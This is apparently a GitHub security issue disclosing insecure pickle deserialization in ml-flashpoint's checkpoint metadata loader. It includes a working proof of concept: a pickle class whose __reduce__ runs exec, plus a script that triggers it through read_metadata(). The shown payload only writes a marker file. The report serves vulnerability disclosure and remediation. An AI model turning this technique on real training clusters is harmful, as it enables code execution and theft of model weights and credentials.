[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint

## Summary

`DefaultMLFlashpointCheckpointLoader.read_metadata()` in `src/ml_flashpoint/core/checkpoint_loader.py` uses `pickle.load()` to deserialize `.metadata` files from checkpoint directories. These files can originate from untrusted peer nodes in a distributed training cluster (via `ReplicationManager.sync_bulk_retrieve`) or from shared storage. An attacker who controls a peer node or can write to shared checkpoint storage can craft a malicious pickle payload that achieves arbitrary code execution on any node that loads the checkpoint metadata.

## Description

- **Type:** Insecure Deserialization (CWE-502)
- **Source:** `.metadata` files read from `Path(checkpoint_id.data) / object_name` (line 152). In distributed deployments, these files arrive via `sync_bulk_retrieve` from peer nodes over the network, or from shared filesystem storage accessible to multiple nodes.
- **Sink:** `pickle.load(f)` at lines 154-155 of `checkpoint_loader.py`. No validation, allowlisting, or sandboxing is applied to the deserialized data.
- **Impact:** Arbitrary code execution with the privileges of the ML training process. An attacker can exfiltrate model weights, training data, credentials, or pivot to other systems in the cluster. In multi-tenant or federated training scenarios, a single compromised or malicious participant can compromise all other nodes.

### Attack Vectors

1. **Malicious peer node:** In a distributed training cluster, `_try_retrieve_object_if_missing()` calls `sync_bulk_retrieve()` to fetch checkpoint objects from peer nodes. A compromised peer can serve a crafted `.metadata` pickle payload. When any other node calls `read_metadata()` (triggered by `_compute_retrieval_plan()` or `get_latest_complete_checkpoint()`), the malicious pickle executes arbitrary code.

2. **Shared storage poisoning:** In shared-storage deployments, an attacker with write access to the checkpoint directory can replace or inject a malicious `.metadata` file. Any node loading that checkpoint will execute the payload.

## Affected

- **Package:** `ml-flashpoint` (pip)
- **Repository:** [google/ml-flashpoint](https://github.com/google/ml-flashpoint)
- **File:** `src/ml_flashpoint/core/checkpoint_loader.py`
- **Function:** `DefaultMLFlashpointCheckpointLoader.read_metadata()` (lines 147-158)
- **Versions:** All versions (as of commit on main branch)

## References

- [Python pickle documentation - Security Warning](https://docs.python.org/3/library/pickle.html#restricting-globals)
- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)

## PoC

A proof-of-concept demonstrates arbitrary code execution by crafting a malicious `.metadata` pickle file that writes a marker file when deserialized.

**payload.py** — generates a malicious `.metadata` file using `pickle.dump()` with a class that overrides `__reduce__` to execute arbitrary code:

```python
import os
import pickle

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
METADATA_FILE = os.path.join(CHECKPOINT_DIR, ".metadata")


class MaliciousPayload:
    def __reduce__(self):
        return (exec, ("open('pwned.txt','w').write('pwned')",))


def generate():
    os.makedirs(CHECKPOINT_DIR, exist_ok=True)
    with open(METADATA_FILE, "wb") as f:
        pickle.dump(MaliciousPayload(), f)
    return METADATA_FILE
```

**exploit.py** — invokes the real `DefaultMLFlashpointCheckpointLoader.read_metadata()` from the built ml-flashpoint package:

```python
import os
import sys

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
sys.path.insert(0, POC_DIR)

import payload
from ml_flashpoint.core.checkpoint_id_types import CheckpointContainerId
from ml_flashpoint.core.checkpoint_loader import DefaultMLFlashpointCheckpointLoader

if os.path.exists("pwned.txt"):
    os.remove("pwned.txt")

payload.generate()
loader = DefaultMLFlashpointCheckpointLoader(None, None)
loader.read_metadata(CheckpointContainerId(CHECKPOINT_DIR), ".metadata")

if os.path.exists("pwned.txt"):
    print("EXPLOIT_SUCCESS:", open("pwned.txt").read())
else:
    sys.exit(1)
```

Running the exploit creates `pwned.txt`, proving arbitrary code execution via `pickle.load()` in `read_metadata()`.

## Remediation

Replace `pickle.load()` with a safe deserialization method. 


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint #74

Summary

Description

Attack Vectors

Affected

References

PoC

Remediation

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint #74

Description

Summary

Description

Attack Vectors

Affected

References

PoC

Remediation

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions